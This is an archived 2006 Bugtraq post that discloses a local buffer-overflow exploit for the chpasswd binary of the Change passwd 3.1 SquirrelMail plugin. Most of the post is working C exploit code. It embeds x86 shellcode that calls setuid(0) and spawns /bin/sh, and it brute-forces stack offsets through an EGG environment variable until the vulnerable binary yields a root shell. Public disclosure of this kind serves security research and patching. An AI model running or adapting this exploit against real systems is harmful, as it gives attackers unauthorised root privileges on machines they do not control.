lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY114-F336310A3D1DC9B6CD56ECDC21C0@phx.gbl>
Date: Thu, 19 Jan 2006 21:14:51 +0000
From: "rod hedor" <rodhedor@...mail.com>
To: news@...urityfocus.com, bugtraq@...urityfocus.com,
	news@...uriTeam.com
Subject: Change passwd  3.1 (SquirrelMail plugin )



Change passwd  3.1 (SquirrelMail plugin )

Coded by rod hedor

web-- http://lezr.com

[local exploit]

  * Multiple
  buffer overflows are present in the handling of command line
arguements in chpasswd.
   The bug allows a
hacker to exploit the process to run arbitrary code.

#include <stdio.h>
#include <stdlib.h>

const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
		       "\x90\x90\x90\x90\x90\x90\x90\x90"
		       "\x90\x90\x90\x90\x90\x90\x90\x90"
                       "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
		       "\x89\xe5\x31\xc0\x50\x55\x89\xe5"
                       "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
                       "\x2f\x62\x69\x89\xe3\x89\xe9\x89"
                       "\xea\xb0\x0b\xcd\x80";

long get_sp(){
	__asm__("movl %esp,%eax;");
};

int main(){
	char buffer[1024];
	long stack = get_sp();
	int result = 1;
	long offset = 0;
	printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n");
	printf ("[+] Current stack [0x%x]\n",stack);
	while(offset <= 268435456){
	offset = offset + 1;
	stack = get_sp() + offset;
	memcpy(&buffer,"EGG=",4);
	int a = 4;
	while(a <= 108){
		memcpy(&buffer[a],"x",1);
		a = a + 1;}
	memcpy(&buffer[108],&stack,4);
	memcpy(&buffer[112],&shellcode,sizeof(shellcode));
	putenv(buffer);
	result = system("./chpasswd $EGG");
	if(result == 0){exit(0);};
	};
};

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ